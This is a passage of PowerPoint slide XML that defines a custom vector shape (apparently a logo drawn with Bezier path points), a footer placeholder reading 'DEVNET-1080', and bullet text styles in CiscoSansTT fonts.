              <a:gd name="T95" fmla="*/ 969 h 1365"/>
              <a:gd name="T96" fmla="*/ 649 w 4066"/>
              <a:gd name="T97" fmla="*/ 1345 h 1365"/>
              <a:gd name="T98" fmla="*/ 703 w 4066"/>
              <a:gd name="T99" fmla="*/ 1068 h 1365"/>
              <a:gd name="T100" fmla="*/ 937 w 4066"/>
              <a:gd name="T101" fmla="*/ 1240 h 1365"/>
              <a:gd name="T102" fmla="*/ 691 w 4066"/>
              <a:gd name="T103" fmla="*/ 1221 h 1365"/>
              <a:gd name="T104" fmla="*/ 923 w 4066"/>
              <a:gd name="T105" fmla="*/ 1116 h 1365"/>
              <a:gd name="T106" fmla="*/ 863 w 4066"/>
              <a:gd name="T107" fmla="*/ 1029 h 1365"/>
              <a:gd name="T108" fmla="*/ 863 w 4066"/>
              <a:gd name="T109" fmla="*/ 961 h 1365"/>
              <a:gd name="T110" fmla="*/ 1278 w 4066"/>
              <a:gd name="T111" fmla="*/ 1280 h 1365"/>
              <a:gd name="T112" fmla="*/ 1354 w 4066"/>
              <a:gd name="T113" fmla="*/ 1099 h 1365"/>
              <a:gd name="T114" fmla="*/ 1078 w 4066"/>
              <a:gd name="T115" fmla="*/ 1156 h 1365"/>
              <a:gd name="T116" fmla="*/ 1357 w 4066"/>
              <a:gd name="T117" fmla="*/ 1206 h 1365"/>
              <a:gd name="T118" fmla="*/ 1893 w 4066"/>
              <a:gd name="T119" fmla="*/ 1158 h 1365"/>
              <a:gd name="T120" fmla="*/ 1693 w 4066"/>
              <a:gd name="T121" fmla="*/ 1356 h 1365"/>
              <a:gd name="T122" fmla="*/ 1603 w 4066"/>
              <a:gd name="T123" fmla="*/ 115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66" h="1365">
                <a:moveTo>
                  <a:pt x="3679" y="626"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3659" y="674"/>
                  <a:pt x="3650" y="708"/>
                  <a:pt x="3650" y="728"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3636" y="753"/>
                  <a:pt x="3628" y="807"/>
                  <a:pt x="3628" y="826"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3628" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3665" y="907"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3684" y="936"/>
                  <a:pt x="3662" y="944"/>
                  <a:pt x="3718" y="964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3738" y="964"/>
                  <a:pt x="3752" y="950"/>
                  <a:pt x="3763" y="919"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3763" y="910"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3763" y="838"/>
                  <a:pt x="3789" y="739"/>
                  <a:pt x="3811" y="668"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3811" y="637"/>
                  <a:pt x="3840" y="541"/>
                  <a:pt x="3938" y="307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3938" y="282"/>
                  <a:pt x="3961" y="234"/>
                  <a:pt x="4006" y="160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4043" y="98"/>
                  <a:pt x="4054" y="107"/>
                  <a:pt x="4065" y="98"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4065" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4051" y="48"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4051" y="48"/>
                  <a:pt x="4037" y="34"/>
                  <a:pt x="4000" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4000" y="17"/>
                  <a:pt x="3964" y="0"/>
                  <a:pt x="3950" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3938" y="0"/>
                  <a:pt x="3916" y="22"/>
                  <a:pt x="3893" y="67"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3679" y="626"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3507" y="1308"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3507" y="1333"/>
                  <a:pt x="3481" y="1342"/>
                  <a:pt x="3509" y="1359"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3554" y="1359"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3605" y="1333"/>
                  <a:pt x="3622" y="1291"/>
                  <a:pt x="3684" y="1150"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3684" y="1119"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3684" y="1099"/>
                  <a:pt x="3701" y="1091"/>
                  <a:pt x="3659" y="1062"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3648" y="1062"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3566" y="1062"/>
                  <a:pt x="3546" y="1102"/>
                  <a:pt x="3507" y="1266"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3507" y="1308"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2183" y="1359"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2149" y="1359"/>
                  <a:pt x="2101" y="1328"/>
                  <a:pt x="2039" y="1268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2009" y="1232"/>
                  <a:pt x="1992" y="1195"/>
                  <a:pt x="1989" y="1161"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1989" y="1065"/>
                  <a:pt x="1984" y="1012"/>
                  <a:pt x="2070" y="618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2084" y="581"/>
                  <a:pt x="2087" y="558"/>
                  <a:pt x="2146" y="307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2169" y="203"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2177" y="160"/>
                  <a:pt x="2180" y="158"/>
                  <a:pt x="2180" y="158"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2183" y="155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2189" y="155"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2271" y="177"/>
                  <a:pt x="2310" y="208"/>
                  <a:pt x="2310" y="245"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2310" y="276"/>
                  <a:pt x="2307" y="290"/>
                  <a:pt x="2262" y="395"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2217" y="499"/>
                  <a:pt x="2231" y="443"/>
                  <a:pt x="2169" y="747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2155" y="818"/>
                  <a:pt x="2141" y="952"/>
                  <a:pt x="2124" y="1153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2135" y="1268"/>
                  <a:pt x="2144" y="1305"/>
                  <a:pt x="2169" y="1305"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2183" y="1359"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2485" y="392"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2471" y="395"/>
                  <a:pt x="2457" y="446"/>
                  <a:pt x="2448" y="544"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2465" y="550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2493" y="547"/>
                  <a:pt x="2530" y="513"/>
                  <a:pt x="2570" y="451"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2570" y="443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2567" y="423"/>
                  <a:pt x="2541" y="406"/>
                  <a:pt x="2491" y="389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2485" y="392"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2400" y="1305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2392" y="1283"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2386" y="1175"/>
                  <a:pt x="2389" y="1108"/>
                  <a:pt x="2395" y="1077"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2386" y="1054"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2386" y="1012"/>
                  <a:pt x="2389" y="992"/>
                  <a:pt x="2395" y="989"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2406" y="921"/>
                  <a:pt x="2417" y="885"/>
                  <a:pt x="2426" y="879"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2429" y="835"/>
                  <a:pt x="2454" y="776"/>
                  <a:pt x="2499" y="702"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2496" y="680"/>
                  <a:pt x="2451" y="649"/>
                  <a:pt x="2361" y="612"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2338" y="615"/>
                  <a:pt x="2316" y="663"/>
                  <a:pt x="2299" y="759"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2248" y="969"/>
                  <a:pt x="2228" y="1122"/>
                  <a:pt x="2239" y="1209"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2248" y="1271"/>
                  <a:pt x="2256" y="1302"/>
                  <a:pt x="2268" y="1300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2310" y="1345"/>
                  <a:pt x="2355" y="1364"/>
                  <a:pt x="2409" y="1359"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2400" y="1305"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3092" y="778"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3052" y="829"/>
                  <a:pt x="3049" y="829"/>
                  <a:pt x="3049" y="829"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3047" y="829"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3038" y="835"/>
                  <a:pt x="3024" y="859"/>
                  <a:pt x="3001" y="907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2984" y="924"/>
                  <a:pt x="2945" y="1003"/>
                  <a:pt x="2880" y="1139"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2812" y="1294"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2787" y="1353"/>
                  <a:pt x="2784" y="1356"/>
                  <a:pt x="2784" y="1356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2781" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759" y="1359"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2716" y="1359"/>
                  <a:pt x="2680" y="1342"/>
                  <a:pt x="2654" y="1311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2626" y="1294"/>
                  <a:pt x="2609" y="1252"/>
                  <a:pt x="2609" y="1187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2595" y="862"/>
                  <a:pt x="2575" y="702"/>
                  <a:pt x="2553" y="702"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2553" y="694"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2558" y="683"/>
                  <a:pt x="2570" y="677"/>
                  <a:pt x="2587" y="671"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2708" y="691"/>
                  <a:pt x="2770" y="719"/>
                  <a:pt x="2770" y="756"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2770" y="762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2764" y="778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776" y="804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2770" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2781" y="879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776" y="933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2778" y="1088"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2781" y="1153"/>
                  <a:pt x="2784" y="1153"/>
                  <a:pt x="2784" y="1153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2787" y="1153"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2795" y="1153"/>
                  <a:pt x="2804" y="1133"/>
                  <a:pt x="2815" y="1094"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2849" y="1048"/>
                  <a:pt x="2897" y="955"/>
                  <a:pt x="2965" y="810"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3004" y="770"/>
                  <a:pt x="3041" y="697"/>
                  <a:pt x="3069" y="587"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3109" y="533"/>
                  <a:pt x="3137" y="508"/>
                  <a:pt x="3151" y="508"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3224" y="510"/>
                  <a:pt x="3244" y="536"/>
                  <a:pt x="3244" y="578"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3244" y="592"/>
                  <a:pt x="3233" y="612"/>
                  <a:pt x="3210" y="637"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3092" y="778"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3382" y="567"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3326" y="606"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3281" y="649"/>
                  <a:pt x="3247" y="691"/>
                  <a:pt x="3227" y="739"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3224" y="742"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3224" y="742"/>
                  <a:pt x="3222" y="745"/>
                  <a:pt x="3210" y="764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3165" y="843"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3103" y="989"/>
                  <a:pt x="3072" y="1099"/>
                  <a:pt x="3072" y="1173"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3072" y="1187"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3072" y="1212"/>
                  <a:pt x="3089" y="1243"/>
                  <a:pt x="3123" y="1277"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3154" y="1333"/>
                  <a:pt x="3193" y="1362"/>
                  <a:pt x="3238" y="1362"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3275" y="1353"/>
                  <a:pt x="3295" y="1345"/>
                  <a:pt x="3295" y="1339"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3329" y="1316"/>
                  <a:pt x="3346" y="1300"/>
                  <a:pt x="3346" y="1291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3399" y="1223"/>
                  <a:pt x="3433" y="1167"/>
                  <a:pt x="3450" y="1122"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3450" y="1116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3439" y="1108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3428" y="1116"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3371" y="1201"/>
                  <a:pt x="3309" y="1260"/>
                  <a:pt x="3241" y="1294"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3230" y="1294"/>
                  <a:pt x="3219" y="1285"/>
                  <a:pt x="3213" y="1271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3213" y="1175"/>
                  <a:pt x="3250" y="1043"/>
                  <a:pt x="3323" y="879"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3363" y="882"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3363" y="882"/>
                  <a:pt x="3385" y="885"/>
                  <a:pt x="3405" y="876"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3473" y="849"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3515" y="826"/>
                  <a:pt x="3546" y="790"/>
                  <a:pt x="3566" y="739"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3566" y="685"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3560" y="649"/>
                  <a:pt x="3509" y="609"/>
                  <a:pt x="3411" y="564"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3382" y="567"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3478" y="708"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3484" y="708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3490" y="714"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3450" y="801"/>
                  <a:pt x="3413" y="843"/>
                  <a:pt x="3380" y="843"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3357" y="835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3357" y="829"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3416" y="750"/>
                  <a:pt x="3456" y="708"/>
                  <a:pt x="3478" y="708"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="375" y="1147"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="1187"/>
                  <a:pt x="347" y="1263"/>
                  <a:pt x="257" y="1263"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178" y="1263"/>
                  <a:pt x="116" y="1206"/>
                  <a:pt x="116" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="981"/>
                  <a:pt x="169" y="913"/>
                  <a:pt x="257" y="913"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="913"/>
                  <a:pt x="364" y="967"/>
                  <a:pt x="370" y="1003"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="480" y="1003"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="474" y="938"/>
                  <a:pt x="420" y="818"/>
                  <a:pt x="257" y="818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99" y="818"/>
                  <a:pt x="0" y="936"/>
                  <a:pt x="0" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1252"/>
                  <a:pt x="104" y="1359"/>
                  <a:pt x="257" y="1359"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="429" y="1359"/>
                  <a:pt x="482" y="1221"/>
                  <a:pt x="485" y="1147"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="375" y="1147"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="646" y="826"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="539" y="826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539" y="919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649" y="919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649" y="826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="646" y="826"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="646" y="969"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="539" y="969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539" y="1345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649" y="1345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649" y="969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="646" y="969"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="703" y="1068"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="703" y="1147"/>
                  <a:pt x="773" y="1173"/>
                  <a:pt x="813" y="1181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="824" y="1184"/>
                  <a:pt x="852" y="1189"/>
                  <a:pt x="861" y="1192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="900" y="1201"/>
                  <a:pt x="937" y="1209"/>
                  <a:pt x="937" y="1240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="937" y="1263"/>
                  <a:pt x="914" y="1280"/>
                  <a:pt x="869" y="1280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="827" y="1280"/>
                  <a:pt x="799" y="1257"/>
                  <a:pt x="796" y="1221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="691" y="1221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="694" y="1260"/>
                  <a:pt x="717" y="1353"/>
                  <a:pt x="869" y="1353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1010" y="1353"/>
                  <a:pt x="1050" y="1277"/>
                  <a:pt x="1050" y="1232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1050" y="1181"/>
                  <a:pt x="1019" y="1139"/>
                  <a:pt x="923" y="1116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="917" y="1113"/>
                  <a:pt x="886" y="1108"/>
                  <a:pt x="875" y="1105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="827" y="1094"/>
                  <a:pt x="813" y="1085"/>
                  <a:pt x="813" y="1060"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="813" y="1040"/>
                  <a:pt x="838" y="1029"/>
                  <a:pt x="863" y="1029"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="923" y="1029"/>
                  <a:pt x="934" y="1060"/>
                  <a:pt x="937" y="1077"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1041" y="1077"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1038" y="1040"/>
                  <a:pt x="1010" y="961"/>
                  <a:pt x="863" y="961"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="745" y="961"/>
                  <a:pt x="703" y="1020"/>
                  <a:pt x="703" y="1068"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1357" y="1209"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1349" y="1243"/>
                  <a:pt x="1326" y="1280"/>
                  <a:pt x="1278" y="1280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219" y="1280"/>
                  <a:pt x="1191" y="1229"/>
                  <a:pt x="1191" y="1158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1191" y="1105"/>
                  <a:pt x="1211" y="1037"/>
                  <a:pt x="1278" y="1037"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1321" y="1037"/>
                  <a:pt x="1346" y="1068"/>
                  <a:pt x="1354" y="1099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1462" y="1099"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1456" y="1040"/>
                  <a:pt x="1411" y="958"/>
                  <a:pt x="1278" y="958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1160" y="958"/>
                  <a:pt x="1078" y="1035"/>
                  <a:pt x="1078" y="1156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1078" y="1278"/>
                  <a:pt x="1160" y="1353"/>
                  <a:pt x="1278" y="1353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1417" y="1353"/>
                  <a:pt x="1456" y="1266"/>
                  <a:pt x="1462" y="1206"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1357" y="1206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1357" y="1209"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1693" y="1356"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1809" y="1356"/>
                  <a:pt x="1893" y="1280"/>
                  <a:pt x="1893" y="1158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1893" y="1034"/>
                  <a:pt x="1809" y="961"/>
                  <a:pt x="1693" y="961"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1575" y="961"/>
                  <a:pt x="1493" y="1037"/>
                  <a:pt x="1493" y="1158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1493" y="1280"/>
                  <a:pt x="1575" y="1356"/>
                  <a:pt x="1693" y="1356"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1778" y="1158"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1778" y="1221"/>
                  <a:pt x="1752" y="1280"/>
                  <a:pt x="1690" y="1280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1631" y="1280"/>
                  <a:pt x="1603" y="1229"/>
                  <a:pt x="1603" y="1158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1603" y="1108"/>
                  <a:pt x="1623" y="1037"/>
                  <a:pt x="1690" y="1037"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1752" y="1037"/>
                  <a:pt x="1778" y="1096"/>
                  <a:pt x="1778" y="1158"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5222534" y="4946905"/>
            <a:ext cx="716863" cy="154518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="61586" tIns="30792" rIns="61586" bIns="30792" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="610729"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>DEVNET-1080</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333366077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174621" indent="-174621">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1110"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342892" indent="-138110">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
